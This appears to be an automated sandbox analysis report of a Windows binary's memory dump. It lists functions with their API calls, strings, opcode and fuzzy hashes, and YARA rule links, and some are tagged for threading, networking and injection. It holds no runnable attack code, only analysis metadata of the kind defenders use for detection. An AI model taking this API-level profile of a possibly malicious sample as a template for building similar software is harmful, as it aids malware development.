String ID: ***** VIDEOINPUT LIBRARY - %2.04f - TFW07 *****$AYUV$AYUV$I420$I420$IYUV$IYUV$MJPG$MJPG$UYVY$UYVY$Y211$Y211$Y411$Y411$Y41P$Y41P$YUY2$YUY2$YUYV$YUYV$YV12$YV12$YVU9$YVU9$YVYU$YVYU
API String ID: 550282347-3367503751
Opcode ID: 14738bc5c8039185295264d065c2f7682aa518b2c46b38245d9382e2969ddd98
Instruction ID: f9716c8469a36a553641a67d4dd0ff90e87979c69e3c6f18fd75f9a9b42338b5
Opcode Fuzzy Hash: 14738bc5c8039185295264d065c2f7682aa518b2c46b38245d9382e2969ddd98
Instruction Fuzzy Hash: B941F762D00D9487D713CF48A8063436AA3AFD7B24B1A8275BD182F250E7FF8D9296C4

Uniqueness

Uniqueness Score: -1.00%

Function 00414734, Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 121synchronizationCOMMON

Download Yara Rule

APIs

CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,00000000,?,?,00414B24,00000000,00000000,?,?,00000000,00000000), ref: 00414749
GetLastError.KERNEL32(?,?,00414B24,00000000,00000000,?,?,00000000,00000000), ref: 0041475B

Part of subcall function 0041037A: __EH_prolog.LIBCMT ref: 0041037F

CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,00414B24,00000000,00000000,?,?,00000000,00000000), ref: 0041479E
GetLastError.KERNEL32(?,?,00414B24,00000000,00000000,?,?,00000000,00000000), ref: 004147B0
GetLastError.KERNEL32(?,?,?,?,?,?,?,00414B24,00000000), ref: 00414816
CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,00414B24,00000000), ref: 0041482C
CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,00414B24,00000000), ref: 0041483A
WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?,?,?,?,00414B24,00000000), ref: 0041486C
FindCloseChangeNotification.KERNELBASE(00000000,?,?,?,?,?,?,?,00414B24,00000000), ref: 00414873

Strings

thread, xrefs: 00414852
thread.exit_event, xrefs: 004147D3
thread.entry_event, xrefs: 0041477E

Memory Dump Source

Source File: 00000013.00000002.471421774.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: CloseErrorLast$CreateEventHandle$ChangeFindH_prologNotificationObjectSingleWait
String ID: thread$thread.entry_event$thread.exit_event
API String ID: 915737812-3017686385
Opcode ID: 0b96f98799cca959d87e872a5c5f4159a8fb997fda2d4c03f0d5b9555a85e16c
Instruction ID: 0b79e7f0c15327e9da17b43a34241b3698589d770cc40297c089d4d07e25d328
Opcode Fuzzy Hash: 0b96f98799cca959d87e872a5c5f4159a8fb997fda2d4c03f0d5b9555a85e16c
Instruction Fuzzy Hash: CE41A974A00214AFDB10EFA5C8457AFBBB5EF84354F10807AF805A7391DBB49D46CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 004090D7, Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 174libraryloaderCOMMON

Download Yara Rule

APIs

new.LIBCMT ref: 004D0330
GetModuleHandleA.KERNEL32(?), ref: 004D039F
GetProcAddress.KERNEL32(00000000,?), ref: 004D0426
GetModuleHandleA.KERNEL32(?,00000000,00000024), ref: 004D04D5
GetProcAddress.KERNEL32(00000000), ref: 004D04DC
GetNativeSystemInfo.KERNELBASE(?), ref: 004D04EE
GetSystemInfo.KERNEL32(?), ref: 004D04FA

Strings

e, xrefs: 004D0364
M, xrefs: 004D03C8

Memory Dump Source

Source File: 00000013.00000002.471421774.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: AddressHandleInfoModuleProcSystem$Native
String ID: M$e
API String ID: 4128499644-1261679600
Opcode ID: c02e2e7ff2340a6c78df56473fffbbe9fb9a4c7b8a02dacdbf55722cbdc07883
Instruction ID: 7f076f262e4bb91a6750fffe37d8c54c711c44c40eb3a28a00d27e8eef38a7fb
Opcode Fuzzy Hash: c02e2e7ff2340a6c78df56473fffbbe9fb9a4c7b8a02dacdbf55722cbdc07883
Instruction Fuzzy Hash: 7C512A319083819AE314DF3CD9857AAF7E4FFA9304F105A1FFAC4D60A2EB74A5858716

Uniqueness

Uniqueness Score: -1.00%

Function 004152CD, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 90timeCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 004152D2
EnterCriticalSection.KERNEL32(?), ref: 004152E6
CreateWaitableTimerW.KERNEL32(00000000,00000000,00000000), ref: 00415309
GetLastError.KERNEL32 ref: 00415316

Part of subcall function 0041037A: __EH_prolog.LIBCMT ref: 0041037F

SetWaitableTimer.KERNELBASE(?,?,000493E0,00000000,00000000,00000000), ref: 00415363
new.LIBCMT ref: 00415371
new.LIBCMT ref: 0041538A
LeaveCriticalSection.KERNEL32(?), ref: 004153CE

Strings

timer, xrefs: 00415331

Memory Dump Source

Source File: 00000013.00000002.471421774.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: CriticalH_prologSectionTimerWaitable$CreateEnterErrorLastLeave
String ID: timer
API String ID: 80991882-1792073242
Opcode ID: cdb135c908b685f4243a48fc5eced90cd833a3d47e2270d03613246561c0a4f8
Instruction ID: 81198b5b4e12bd1187ba2ab20eed8b98814ca33eefdc30da37c94bbb21581d96
Opcode Fuzzy Hash: cdb135c908b685f4243a48fc5eced90cd833a3d47e2270d03613246561c0a4f8
Instruction Fuzzy Hash: 253173B1904344EFDB00DF69C8857EEBBB9EF48314F10816EE845AB242D7B48A85CB65

Uniqueness

Uniqueness Score: -1.00%

Function 00452F81, Relevance: 12.1, APIs: 8, Instructions: 87networkCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00452F86
socket.WS2_32(00000002,00000002,00000000), ref: 00452FB4
htons.WS2_32(00000009), ref: 00453005
connect.WS2_32(00000000,?,00000010), ref: 00453016
closesocket.WS2_32(00000000), ref: 00453022

Part of subcall function 00452EC0: __EH_prolog.LIBCMT ref: 00452EC5
Part of subcall function 00452EC0: WSAStartup.WS2_32(00000101,?), ref: 00452EFC
Part of subcall function 00452EC0: gethostbyname.WS2_32(?), ref: 00452F1B
Part of subcall function 00452EC0: inet_ntoa.WS2_32(?), ref: 00452F28

getsockname.WS2_32(00000000,?,00000010), ref: 00453041
closesocket.WS2_32(00000000), ref: 0045304D
inet_ntop.WS2_32(00000002,7F000001,?,00000016), ref: 0045305E

Memory Dump Source

Source File: 00000013.00000002.471421774.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: H_prologclosesocket$Startupconnectgethostbynamegetsocknamehtonsinet_ntoainet_ntopsocket
String ID:
API String ID: 633287244-0
Opcode ID: f5f5fbd19dbca0a862f7eb61407344802759e4f89fe51e6e2834ba27e1eaab73
Instruction ID: 5b0bf888ce328ebc8f7654541aaef070da74032fad1407d6ff225a7c75816ed1
Opcode Fuzzy Hash: f5f5fbd19dbca0a862f7eb61407344802759e4f89fe51e6e2834ba27e1eaab73
Instruction Fuzzy Hash: 8B319571D00208ABDB10DBE5EC49AEEBB7DEF44711F10450BF912E22D2D7B849458B69

Uniqueness

Uniqueness Score: -1.00%

Function 006AC888, Relevance: 9.2, APIs: 6, Instructions: 216COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,?,?,?,?,?,006ACAD9,00000001,00000001,?), ref: 006AC8E2
MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,006ACAD9,00000001,00000001,?,?,?,?), ref: 006AC968
WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 006ACA62
__freea.LIBCMT ref: 006ACA6F

Part of subcall function 006A108E: RtlAllocateHeap.NTDLL(00000000,00000003,00000003,?,006AAD9E,00001000,00000000,?,?,?,006A082B,00000000,00000000,00000000,?,?), ref: 006A10C0

__freea.LIBCMT ref: 006ACA78
__freea.LIBCMT ref: 006ACA9D

Memory Dump Source

Source File: 00000013.00000002.471421774.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: ByteCharMultiWide__freea$AllocateHeap
String ID:
API String ID: 1414292761-0
Opcode ID: 1ec1923b02ff4a2d3de14dc911272f89a5217b01c918c1f7141e847b39a047c4
Instruction ID: 86292834f738c96dbc1cf993336d3d24c26be9c074e51f227bd2506d47692d73
Opcode Fuzzy Hash: 1ec1923b02ff4a2d3de14dc911272f89a5217b01c918c1f7141e847b39a047c4
Instruction Fuzzy Hash: B151F67260021AABEB25AF64CC41EFF77ABEF42760F144229FE04D6254EB34DC40DA90

Uniqueness

Uniqueness Score: -1.00%

Function 004B02E0, Relevance: 9.1, APIs: 6, Instructions: 56COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 004B02E5
std::_Lockit::_Lockit.LIBCPMT ref: 004B02F4

Part of subcall function 004211A8: __EH_prolog.LIBCMT ref: 004211AD
Part of subcall function 004211A8: std::_Lockit::_Lockit.LIBCPMT ref: 004211C1
Part of subcall function 004211A8: std::_Lockit::~_Lockit.LIBCPMT ref: 004211E1

std::locale::_Getfacet.LIBCPMT ref: 004B0314
__CxxThrowException@8.LIBVCRUNTIME ref: 004B034B
std::_Facet_Register.LIBCPMT ref: 004B0361
std::_Lockit::~_Lockit.LIBCPMT ref: 004B036E

Memory Dump Source

Source File: 00000013.00000002.471421774.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: std::_$Lockit$H_prologLockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
String ID:
API String ID: 1252875284-0
Opcode ID: c0e17db30a694421d04265faf59378f693b64b9600864ea3d7819ed5d6e79e0d
Instruction ID: 78f492c9bfe4b46bd4934e7f848da8e9cd49b79d55c67d64c25b280fc1e3c0ca
Opcode Fuzzy Hash: c0e17db30a694421d04265faf59378f693b64b9600864ea3d7819ed5d6e79e0d
Instruction Fuzzy Hash: 8B11A772E005299BCB14FBA4D805AEE7775FF44721F50421EF81567291DB389A01C7A4

Uniqueness

Uniqueness Score: -1.00%

Function 005CC780, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 183COMMON

Download Yara Rule

APIs

SetEvent.KERNEL32(?,CAAA386B), ref: 005CC817

Part of subcall function 00410C7D: __EH_prolog.LIBCMT ref: 00410C82
Part of subcall function 00410C7D: CreateEventA.KERNEL32(00000000,?,?,00000000), ref: 00410C94

CloseHandle.KERNEL32(00000000), ref: 005CC80C
FindCloseChangeNotification.KERNELBASE(?,CAAA386B), ref: 005CC860
CloseHandle.KERNEL32(?), ref: 005CC99E

Strings

>_B, xrefs: 005CC7AD

Memory Dump Source

Source File: 00000013.00000002.471421774.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: Close$EventHandle$ChangeCreateFindH_prologNotification
String ID: >_B
API String ID: 3020830180-1950707887
Opcode ID: 362a47bc872b3051f15b3b993279491c913885c3ec3ff5fe9a3b8ae142340e45
Instruction ID: 458aee22616a25a07981d7de558b9808a53f95f8ae8f4babb211df472a5a5754
Opcode Fuzzy Hash: 362a47bc872b3051f15b3b993279491c913885c3ec3ff5fe9a3b8ae142340e45
Instruction Fuzzy Hash: 7951BFB1A002058FDF14EFA4C984B6ABFA9FF44314F14456DE82ADB282DB35ED41CA55

Uniqueness

Uniqueness Score: -1.00%

Function 00430B17, Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 138COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBVCRUNTIME ref: 00430B1B

Part of subcall function 0068E3DE: RaiseException.KERNEL32(?,00582150,P!X,?,?,0078FB6C,?,?,?,?,?,00582150,?,00783398,?), ref: 0068E43D

__EH_prolog.LIBCMT ref: 00430B26

Part of subcall function 00429BC7: VerSetConditionMask.KERNEL32(00000000,00000000,00000080,00000001,?,?,00000000), ref: 00429C21
Part of subcall function 00429BC7: VerifyVersionInfoW.KERNEL32(0000011C,00000080,00000000), ref: 00429C31

Strings

ovY, xrefs: 00430C57
evY, xrefs: 00430C14
yvY, xrefs: 00430BAD

Memory Dump Source

Source File: 00000013.00000002.471421774.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: ConditionExceptionException@8H_prologInfoMaskRaiseThrowVerifyVersion
String ID: evY$ovY$yvY
API String ID: 427066989-2562377268
Opcode ID: 7e66fc0fb2390a2c9767167f78ed8f89248d71a62f7d286e4ce8b8af001c0436
Instruction ID: 69eeb7d7c3b84b7ea36d890f3107908ae79c651bf5a834563b2563b6c9d57f6f
Opcode Fuzzy Hash: 7e66fc0fb2390a2c9767167f78ed8f89248d71a62f7d286e4ce8b8af001c0436
Instruction Fuzzy Hash: 63511770D04209EFDB10CF99D895AAEFBB8FB08308F24526AE505A7281C7799D058B69

Uniqueness

Uniqueness Score: -1.00%

Function 00415C9C, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 124networkCOMMON

Download Yara Rule

APIs

WSASetLastError.WS2_32(00000000), ref: 00415CB4
_strlen.LIBCMT ref: 00415CE1
MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,?,00000001), ref: 00415D02
WSAStringToAddressW.WS2_32(?,?,00000000,?,00000080), ref: 00415D17

Strings

255.255.255.255, xrefs: 00415D4C

Memory Dump Source

Source File: 00000013.00000002.471421774.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: AddressByteCharErrorLastMultiStringWide_strlen
String ID: 255.255.255.255
API String ID: 211062275-2422070025
Opcode ID: a34b3e0147113994be48e77c40f6aeb01e510548854bc99b354f8fbc08dd0987
Instruction ID: 90f16403a3ccad3dd7e36331342522bdd81ba9cbe8a4690d11ee0a9552b0ec44
Opcode Fuzzy Hash: a34b3e0147113994be48e77c40f6aeb01e510548854bc99b354f8fbc08dd0987
Instruction Fuzzy Hash: C7411731A00614EBDB206B64DC46BEEB769EF81334F20831BF9299B2D1D778598187C5

Uniqueness

Uniqueness Score: -1.00%

Function 006A5B5C, Relevance: 7.6, APIs: 5, Instructions: 129COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 006A5BCE
_free.LIBCMT ref: 006A5BEE

Memory Dump Source

Source File: 00000013.00000002.471421774.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: be8943407bce04aae76bd1d451bf57b1cb50652c9b20bd453014df5c09148e43
Instruction ID: 39285974b7beede999f61587a776756efcc8bd5e2c2af604e75fe132b50d0e39
Opcode Fuzzy Hash: be8943407bce04aae76bd1d451bf57b1cb50652c9b20bd453014df5c09148e43
Instruction Fuzzy Hash: 6B41D472A007049FDB20EF78C880A59B7B2EF85324B2545ADE916EB341DB30ED01CB44

Uniqueness

Uniqueness Score: -1.00%

Function 00414441, Relevance: 7.6, APIs: 5, Instructions: 77COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00414446
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,0041F3B3,?,0041F3E1,?,?,?,?,0041EE4E,?), ref: 00414456
LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,0041F3B3,?,0041F3E1,?,?,?,?,0041EE4E,?), ref: 00414484
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,0041F3B3,?,0041F3E1,?,?,?,?,0041EE4E,?), ref: 004144AD
LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,0041F3B3,?,0041F3E1,?,?,?,?,0041EE4E), ref: 004144F7

Memory Dump Source

Source File: 00000013.00000002.471421774.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: CriticalSection$EnterLeave$H_prolog
String ID:
API String ID: 1633115879-0
Opcode ID: 48a8dd1e56f148ea3e8c9edaf9ab52552c3326993aacd736f61a3b6608c45d46
Instruction ID: e37c270583d34f6fdcbed936fd6dc41b70da8ade8f22dd1501a04d0a02904186
Opcode Fuzzy Hash: 48a8dd1e56f148ea3e8c9edaf9ab52552c3326993aacd736f61a3b6608c45d46
Instruction Fuzzy Hash: D231AC759042559FDB10CF68C98479ABBB5FF88710F20864EE85597301C7B9ED81CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 004146D0, Relevance: 7.5, APIs: 5, Instructions: 36synchronizationthreadinjectionCOMMON

Download Yara Rule

APIs

WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 004146EE
CloseHandle.KERNEL32(?), ref: 004146F7
TerminateThread.KERNEL32(?,00000000), ref: 00414711
QueueUserAPC.KERNELBASE(004146A3,?,00000000), ref: 0041471E
WaitForSingleObject.KERNEL32(?,000000FF), ref: 00414729

Memory Dump Source

Source File: 00000013.00000002.471421774.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: Wait$CloseHandleMultipleObjectObjectsQueueSingleTerminateThreadUser
String ID:
API String ID: 3892215915-0
Opcode ID: 3ec5ae4b6e7c796421652c2a7545122f5017f0dce0ab16dcd00dd9a7be1801ad
Instruction ID: 1e819aa565a8910f63e950dfc57558bee440c737e81045b7b22afa792695e07a
Opcode Fuzzy Hash: 3ec5ae4b6e7c796421652c2a7545122f5017f0dce0ab16dcd00dd9a7be1801ad
Instruction Fuzzy Hash: DDF09630504704EFE7509F64DC49FA67BF9EB49721F104269F52ED66E0DBB1AC808B60

Uniqueness

Uniqueness Score: -1.00%

Function 00694F05, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 54threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNELBASE ref: 00694F4E
GetLastError.KERNEL32(?,?,?,00414806,00000000,00000000,0041487E), ref: 00694F5A
__dosmaperr.LIBCMT ref: 00694F61

Strings

~HA, xrefs: 00694F28

Memory Dump Source

Source File: 00000013.00000002.471421774.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: CreateErrorLastThread__dosmaperr
String ID: ~HA
API String ID: 2744730728-2555717699
Opcode ID: 012f35cf20328ae3c923eebbffb2d189a03c25afb4f31a3854c950dbbcf6196d
Instruction ID: a28228cb249d192a0490e985ea7e308233fdceaf7abf6463b4ce0b4950d670d3
Opcode Fuzzy Hash: 012f35cf20328ae3c923eebbffb2d189a03c25afb4f31a3854c950dbbcf6196d
Instruction Fuzzy Hash: F501693650521AABDF259FA1DC05E9F3B6FEFC4360F010028F80486A10DF318812C6A0

Uniqueness

Uniqueness Score: -1.00%

Function 006AB96D, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 47COMMON

Download Yara Rule

APIs

LCMapStringEx.KERNELBASE ref: 006AB9C0
LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000001,?,?), ref: 006AB9DE

Strings

LCMapStringEx, xrefs: 006AB988
0A, xrefs: 006AB9BA

Memory Dump Source

Source File: 00000013.00000002.471421774.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: String
String ID: 0A$LCMapStringEx
API String ID: 2568140703-1841893537
Opcode ID: ea4460510015f5977b781a5df97bf006a9c03b4116b64c3ed7a6936ed41caf73
Instruction ID: 78663075d4456955a6bdf8df67ea3bbf43c27e8d08bc1616b7ad118f32a7fa07
Opcode Fuzzy Hash: ea4460510015f5977b781a5df97bf006a9c03b4116b64c3ed7a6936ed41caf73
Instruction Fuzzy Hash: 15012532640209BBDF026F90DD06DEE3FA3EF0A760F004118FE0866261CB768971AF85

Uniqueness

Uniqueness Score: -1.00%

Function 0042100C, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 24COMMON

Download Yara Rule

APIs

std::exception::exception.LIBCONCRT ref: 00421014

Part of subcall function 0040F2EC: ___std_exception_copy.LIBVCRUNTIME ref: 0040F313

__CxxThrowException@8.LIBVCRUNTIME ref: 00421031

Part of subcall function 0068E3DE: RaiseException.KERNEL32(?,00582150,P!X,?,?,0078FB6C,?,?,?,?,?,00582150,?,00783398,?), ref: 0068E43D

Strings

bad locale name, xrefs: 0042100C
\$n, xrefs: 00421028, 00421030

Memory Dump Source

Source File: 00000013.00000002.471421774.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: ExceptionException@8RaiseThrow___std_exception_copystd::exception::exception
String ID: \$n$bad locale name
API String ID: 4055469071-1203730499
Opcode ID: 1b75a0af376e86cef2cb94bfe60e125401c4bcedd4f989fc5e17589a774403c4
Instruction ID: de4c522dbd7238e892ea0bd5804268c61348616e56c2409af10b3955a1e18fc5
Opcode Fuzzy Hash: 1b75a0af376e86cef2cb94bfe60e125401c4bcedd4f989fc5e17589a774403c4
Instruction Fuzzy Hash: E2E0E532D4568AEACB00EFE4D401ADEFB75AB00310F1082AEE414A71C2CB7D0600CB84

Uniqueness

Uniqueness Score: -1.00%

Function 005717F8, Relevance: 6.1, APIs: 4, Instructions: 91COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 005717FD
new.LIBCMT ref: 0057182A
InitializeCriticalSection.KERNEL32(0000001C,00000000,007A4460,?,?,00571F4A,?,?,?,0040F09B), ref: 0057184D
CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?,00571F4A,?,?,?,0040F09B), ref: 00571864

Memory Dump Source

Source File: 00000013.00000002.471421774.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: CreateCriticalEventH_prologInitializeSection
String ID:
API String ID: 3158263371-0
Opcode ID: 94b41bb9ff59bbe4f5ad02acec730859a2dbfae20486d502a5a7aa5c2f1e2c00
Instruction ID: 876213ab9cbc130f362b3ed82c620c3093d4f37ea1a0ae280deac4a34f932a9a
Opcode Fuzzy Hash: 94b41bb9ff59bbe4f5ad02acec730859a2dbfae20486d502a5a7aa5c2f1e2c00
Instruction Fuzzy Hash: BC3132B08053009FDBA4DF68D8847967BE4FF09310F1046AEEC19CF28AE3B18944CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 0041487E, Relevance: 6.0, APIs: 4, Instructions: 32COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00414883
SetEvent.KERNEL32(00000000), ref: 00414897
SetEvent.KERNEL32(?), ref: 004148B4
SleepEx.KERNELBASE(000000FF,00000001), ref: 004148BE

Memory Dump Source

Source File: 00000013.00000002.471421774.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: Event$H_prologSleep
String ID:
API String ID: 1765829285-0
Opcode ID: 2a203f42bc5b33d3a13a3af4d886ce5b736f630bb6aebf30fe298175220b8e56
Instruction ID: 485320c20e7a0a70c1a616592e1f4c203106a78677124a96d5512a3dd4e7ad03
Opcode Fuzzy Hash: 2a203f42bc5b33d3a13a3af4d886ce5b736f630bb6aebf30fe298175220b8e56
Instruction Fuzzy Hash: 12F04F71600214EFDB10DF98D8C9B98BBB1FF09321F108258F5199B292C7749A80CB55

Uniqueness

Uniqueness Score: -1.00%

Function 0041F2D9, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 53COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0041F2DE

Strings

yFA, xrefs: 0041F2F3
HA, xrefs: 0041F31E

Memory Dump Source

Source File: 00000013.00000002.471421774.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: H_prolog
String ID: yFA$HA
API String ID: 3519838083-819086381
Opcode ID: 649df98a89199086e95e4fc606170e50c03dc2fc8513806fa02c722f5c2561a2
Instruction ID: be5c42be2c6e3d10ebd187c374126fcc079f844a785c0e5cd0415d1f854fe2d0
Opcode Fuzzy Hash: 649df98a89199086e95e4fc606170e50c03dc2fc8513806fa02c722f5c2561a2
Instruction Fuzzy Hash: 232110B1901609EFC704CF5AC285689FFF4FF48310F6081AED0989B762D3B49A50CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00694D25, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 38threadCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00787350,00000010), ref: 00694D38
ExitThread.KERNEL32 ref: 00694D3F

Strings

0A, xrefs: 00694D74

Memory Dump Source

Source File: 00000013.00000002.471421774.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: ErrorExitLastThread
String ID: 0A
API String ID: 1611280651-187954893
Opcode ID: aa497236cf176ef17a3b454ef00a04b474a789f811a1e7152174b5b94ede9673
Instruction ID: 2efdd878437aebd3bf93266263e471f643659c3a6f6777dfb9798e7ab1f8543b
Opcode Fuzzy Hash: aa497236cf176ef17a3b454ef00a04b474a789f811a1e7152174b5b94ede9673
Instruction Fuzzy Hash: 8CF08C74500205AFDB44BB70C84AAAD3B6AFF45700F10014CF5026B692CB75AD41DFA5

Uniqueness

Uniqueness Score: -1.00%

Function 00414C58, Relevance: 4.6, APIs: 3, Instructions: 116timeCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00414C5D
SetWaitableTimer.KERNELBASE(00000001,?,00000001,00000000,00000000,00000000), ref: 00414C8C
GetQueuedCompletionStatus.KERNEL32(00000000,00000000,00000000,?,?,?), ref: 00414D4C

Memory Dump Source

Source File: 00000013.00000002.471421774.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: CompletionH_prologQueuedStatusTimerWaitable
String ID:
API String ID: 2995059299-0
Opcode ID: a5d252669b9f60b85a81388a257bfec91c7b689e5e5c4f13bc946e12480acd58
Instruction ID: 7d45d137beb1f6b2b34f5553cb745bb15eb055e86ce864ac407ad0ee56832f04
Opcode Fuzzy Hash: a5d252669b9f60b85a81388a257bfec91c7b689e5e5c4f13bc946e12480acd58
Instruction Fuzzy Hash: 11416972A0060A9FDB15DF90D880BEFB3BAFF84315F00052ED412A6640DB78A945CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 004155BD, Relevance: 4.6, APIs: 3, Instructions: 80COMMON

Download Yara Rule

APIs

closesocket.WS2_32 ref: 00415614
ioctlsocket.WS2_32(?,8004667E,00000000), ref: 00415675
closesocket.WS2_32 ref: 0041567F

Memory Dump Source

Source File: 00000013.00000002.471421774.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: closesocket$ioctlsocket
String ID:
API String ID: 1937125420-0
Opcode ID: f970fa329fb201515a75755932be49706c74111033a6c082b1986b8d9337fbe5
Instruction ID: 0867f8573ec13ec267d5fb650704c9035aa2dc82b8724a08c876cf7a7597308c
Opcode Fuzzy Hash: f970fa329fb201515a75755932be49706c74111033a6c082b1986b8d9337fbe5
Instruction Fuzzy Hash: 8B213B31900619ABCB10EB64CCC1AFE7775AF80318F04816AEC15AB2C1EB785D85C798

Uniqueness

Uniqueness Score: -1.00%

Function 004160FF, Relevance: 4.5, APIs: 3, Instructions: 44COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00416104
EnterCriticalSection.KERNEL32(?,?), ref: 00416121
LeaveCriticalSection.KERNEL32(?), ref: 00416160

Memory Dump Source

Source File: 00000013.00000002.471421774.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: CriticalSection$EnterH_prologLeave
String ID:
API String ID: 367238759-0
Opcode ID: d0c113fbeb00a019116e248b927bd9237ee2790a523a3c3fc403efa86fd83a73
Instruction ID: de7e618a69ece48fe05348024f7aad34e8c204bac18a713b4793032de90bd1dd
Opcode Fuzzy Hash: d0c113fbeb00a019116e248b927bd9237ee2790a523a3c3fc403efa86fd83a73
Instruction Fuzzy Hash: F20180B1901704EFC724DF29D980A9BBBF5FF48710B10462EE84693B02D774E985CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 00694DD9, Relevance: 4.5, APIs: 3, Instructions: 31threadCOMMON

Download Yara Rule

APIs

Part of subcall function 006A9F63: GetLastError.KERNEL32(?,?,?,0069C0D2,006A0714,?,006A9F0D,00000001,00000364,?,00694D4A,00787350,00000010), ref: 006A9F68
Part of subcall function 006A9F63: _free.LIBCMT ref: 006A9F9D
Part of subcall function 006A9F63: SetLastError.KERNEL32(00000000), ref: 006A9FD1

ExitThread.KERNEL32 ref: 00694DEB
CloseHandle.KERNEL32(?,?,?,00694F97,?,?,00694D82,00000000), ref: 00694E13
FreeLibraryAndExitThread.KERNELBASE(?,?,?,?,00694F97,?,?,00694D82,00000000), ref: 00694E29

Memory Dump Source

Source File: 00000013.00000002.471421774.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: ErrorExitLastThread$CloseFreeHandleLibrary_free
String ID:
API String ID: 1198197534-0
Opcode ID: 0b684379a3635da3496ba8be5a775a66397e6181a37d77da4e3ed34cfb2c9944
Instruction ID: 1797eb193d2ac906eade3a6409676f5f76e6e4c1304b61f1546358f000c6dd65
Opcode Fuzzy Hash: 0b684379a3635da3496ba8be5a775a66397e6181a37d77da4e3ed34cfb2c9944
Instruction Fuzzy Hash: C4F05E384007416BDF216B75D888EAB7A9FAF05364F194714F824C7AA1DF70DD96CA90

Uniqueness

Uniqueness Score: -1.00%

Function 0044DB7B, Relevance: 4.5, APIs: 3, Instructions: 28COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0044DB80

Part of subcall function 0044DE59: __EH_prolog.LIBCMT ref: 0044DE5E
Part of subcall function 0044DE59: new.LIBCMT ref: 0044DE84
Part of subcall function 0044DE59: GetModuleHandleA.KERNEL32(?,?,?,?,00000000), ref: 0044DEEB
Part of subcall function 0044DE59: GetProcAddress.KERNEL32(?,?), ref: 0044DF6C

